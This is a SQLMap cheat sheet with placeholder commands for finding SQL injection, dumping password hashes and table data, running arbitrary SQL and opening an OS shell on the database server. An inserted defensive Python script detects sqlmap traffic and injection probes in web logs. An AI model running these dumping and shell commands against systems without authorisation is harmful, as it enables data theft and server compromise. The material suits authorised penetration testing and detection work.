SQLMap - SQL Injection Detection Tool

Utilize SQLMap for comprehensive SQL injection detection and exploitation. Learn to identify vulnerabilities, extract database information, and gain shell access with this powerful tool.

SQLMap Usage Examples

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It features a detection engine with a vast array of specific exploit payloads covering many database types and operating systems. This section provides practical command-line examples for using SQLMap effectively.

SQL Injection Detection Commands

These commands focus on identifying and confirming SQL injection vulnerabilities in web applications.

# Test URL and POST data and return database banner (if possible)
./sqlmap.py --url="<url>" --data="<post-data>" --banner

# Parse a saved HTTP request file and test it | the request can be captured with Burp
./sqlmap.py -r <request-file> <options>

# Fingerprint | much more information than banner
./sqlmap.py -r <request-file> --fingerprint
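
Seen from the server side, the detection runs above leave traces in web access logs. The following is an added example, not part of the original page or of the SQLMap project: a small log triage script that flags clients whose requests carry the default sqlmap User-Agent or common injection-probe shapes in the URL. The function names, probe patterns and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# sqlmap's default User-Agent starts with "sqlmap/<version>" and names sqlmap.org.
SQLMAP_UA = re.compile(r"\bsqlmap/\d", re.I)
# Generic injection-probe shapes looked for in URL-decoded request URIs.
PROBES = {
    "boolean": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time": re.compile(r"\b(?:SLEEP|PG_SLEEP|BENCHMARK)\s*\(|\bWAITFOR\s+DELAY\b", re.I),
}
# Combined Log Format: ip - - [ts] "METHOD uri PROTO" status size "referer" "ua"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def classify(line):
    """Return (client_ip, sorted reasons) for one log line, or None if unparsable."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    reasons = set()
    if SQLMAP_UA.search(m["ua"]):
        reasons.add("sqlmap-user-agent")
    uri = unquote_plus(m["uri"])  # decode %20, '+' and %3D before matching
    reasons.update(name for name, rx in PROBES.items() if rx.search(uri))
    return m["ip"], sorted(reasons)

def suspicious_clients(lines):
    """Map each flagged client IP to the set of reasons it was flagged for."""
    hits = {}
    for ip, reasons in filter(None, map(classify, lines)):
        if reasons:
            hits.setdefault(ip, set()).update(reasons)
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE = [
    '203.0.113.5 - - [10/Mar/2024:10:00:01 +0000] "GET /item?id=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2024:10:00:02 +0000] "GET /item?id=7%20AND%204821%3D4821 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '192.0.2.44 - - [10/Mar/2024:10:00:03 +0000] "GET /item?id=7+UNION+ALL+SELECT+NULL--+- HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2024:10:00:04 +0000] "POST /login HTTP/1.1" 200 90 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
]

if __name__ == "__main__":
    for ip, reasons in sorted(suspicious_clients(SAMPLE).items()):
        print(ip, sorted(reasons))
```

The User-Agent is client-controlled and POST bodies are usually absent from access logs, so a clean result here is not proof that no testing occurred.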

Database Information Extraction

Once a vulnerability is found, these commands help in enumerating and extracting sensitive data from the database.

# Get database username, name, and hostname
./sqlmap.py -r <request-file> --current-user --current-db --hostname

# Check if user is a database admin
./sqlmap.py -r <request-file> --is-dba

# Get database users and password hashes
./sqlmap.py -r <request-file> --users --passwords

# Enumerate databases
./sqlmap.py -r <request-file> --dbs

# List tables for one database
./sqlmap.py -r <request-file> -D <db-name> --tables

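# Other database commands: list columns, enumerate the schema, count table entries
./sqlmap.py -r <request-file> -D <db-name> --columns
./sqlmap.py -r <request-file> -D <db-name> --schema
./sqlmap.py -r <request-file> -D <db-name> --count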

Data Enumeration and Dumping

Specific commands for targeting tables and columns to extract data.

# Enumeration flags: scope to a database (-D), table (-T), column (-C), or DBMS user (-U)
./sqlmap.py -r <request-file> -D <db-name> \
                              -T <tbl-name> \
                              -C <col-name> \
                              -U <user-name>

# Extract data
./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

Advanced SQLMap Operations

Commands for executing custom SQL queries and gaining operating system access.

# Execute SQL Query
./sqlmap.py -r <request-file> --sql-query="<sql-query>"

# Prepend/append a string to every injection payload
./sqlmap.py -r <request-file> --prefix="<prefix-string>" --suffix="<suffix-string>"

# Get backdoor access to the database server | can give shell access
./sqlmap.py -r <request-file> --os-shell

Further Resources

For more in-depth information and advanced usage, refer to the official SQLMap documentation and resources on web security.